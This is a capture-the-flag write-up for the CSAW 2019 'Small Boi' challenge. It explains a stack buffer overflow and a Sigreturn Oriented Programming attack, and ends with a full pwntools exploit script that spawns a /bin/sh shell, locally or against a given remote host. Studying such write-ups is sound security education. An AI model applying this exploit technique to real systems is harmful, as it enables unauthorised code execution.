Sigreturn Oriented Programming

Small Boi CSAW 2019

Download the challenge binary here.

Section One - Enumeration

Running the file command shows that the challenge is a 64-bit elf executable.

64 Bit Executable

Using the radare2 suite to check the strings within the binary. It becomes apparent the string "/bin/sh" is present within the read only data section.

/bin/sh in read only data section

Checking the memory protections of the binary shows the only exploit mitigation in place is Data Execution Prevention.

Data execution prevention enabled

Section Two - Reverse Engineering

The Vulnerability

The program is taking the address of RBP-0x20 and then stores it within the RSI register. This means the allocated space for the buffer is 0x20 or 32 in decimal.

1. The syscall number for SYS_READ is stored in the RAX register.

2. The file descriptor is set to STDIN within the RDI register.

3. Defines the amount of bytes the SYS_READ syscall will read.

Due to the amount of bytes read being greater than the allocated space the application suffers from a Buffer Overflow vulnerability.

The Vulnerability

To confirm the vulnerability, the program was given 16 bytes more than allocated on the stack, causing the first 8 bytes to overwrite the stack frame's stored RBP whereas the last 8 bytes overwrite the stack frame's Return Address.

Overwriting return address

Section Three - Exploitation

Before diving further in, there are a few restrictions this binary presents.

• Data Execution Prevention is enabled, thus we cannot return to something such as shellcode.

• Neither is regular Return Oriented Programming a valid method of exploitation due to the lack of control over the RDI Register which is needed for the first argument of a syscall.

Lack of ROP Gadgets

However, the binary does include a "POP RAX" gadget as well as the "syscall" instruction. To conclude the conditions met.

1. A very large overflow with no shortage of space.

2. Control over the RAX register which allows the specification of a syscall number.

3. Access to a syscall instruction.

4. The string "/bin/sh" is present within the binary.

5. Control over the Stack Frame's saved return address; this translates to control over the stack itself.

The combination of the conditions above allows implementation of Sigreturn Oriented Programming.

Control Over EAX

Syscall Instruction

Before performing the sigreturn syscall, the following Signal Frame needs to be present on the stack.

Signal Frame Layout

Section Four - Exploit Development

The first step of exploitation is to redirect the binary into performing a SYS_SIGRETURN syscall, then to return into a curated signal frame which results in a shell.

In order accomplish this initial syscall, the following must take place:

1. Provide enough input to have the following bytes overwrite the return address which redirects code execution.

2. POP the currently stored value out of the EAX register to prepare for a value to be given.

3. Assign the Syscall number for SYS_Sigreturn to EAX register.

4. Use the syscall instruction to perform the SYS_Sigreturn Syscall.

pwn = b"A" * 40         # padding to overwrite return addr
pwn += p64(0x40018a)    # pop rax
pwn += p64(0xf)         # assign sigreturn syscall number to rax
pwn += p64(0x400185)    # syscall instruction

Using the pwntools library, generating a Sigreturn Frame resulting in a shell is relatively straightforward. To begin, specifying the Architecture is necessary. This can be accomplished with.

frame = SigreturnFrame(kernel="amd64")

Using the following code the registers can be assigned values to prepare the registers for an SYS_EXECVE syscall.

# Syscall Number
frame.rax = 0x3B        # Syscall Number for SYS_EXECVE

# All arguments for execve syscall
frame.rdi = 0x004001ca  # Pointer to "/bin/sh" string in .rodata
frame.rsi = 0           # Null Pointer
frame.rdx = 0           # Null Pointer

# Address of Syscall Instruction
frame.rip = 0x400185

The previous code snippets combined result in the following completed exploit.

 #!/usr/bin/env python3
from pwn import *
import sys

#-------------------------------
#-+-+-+ Twitter @0xRoman1 +-+-+-
#-------------------------------

#==============================================================

#context.log_level = "debug"
elf = context.binary = ELF("small_boi")
libc = elf.libc
env = {}

gs = '''
continue
'''

def start():
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs, env=env)
    elif args.REMOTE:
        return remote(sys.argv[1], int(sys.argv[2]))
    else:
        return process(elf.path, env=env)


io = start()

#==============================================================

# Syscall number for Sigreturn = 0xf

pwn = b"A" * 40           # padding to overwrite return addr
pwn += p64(0x40018a)      # pop rax
pwn += p64(0xf)           # assign sigreturn syscall number to rax
pwn += p64(0x400185)      # syscall instruction

frame = SigreturnFrame(kernel="amd64")

# Syscall Number
frame.rax = 0x3B          # Syscall Number for SYS_EXECVE

# All arguments for execve syscall
frame.rdi = 0x004001ca    # Pointer to "/bin/sh" string in .rodata
frame.rsi = 0             # Null Pointer
frame.rdx = 0             # Null Pointer

# Address of Syscall Instruction
frame.rip = 0x400185

pwn += bytes(frame)

#==============================================================
# =-=-=- EXPLOITATION -=-=-=

io.sendline(pwn)
io.interactive()

#==============================================================

Section Five - Profit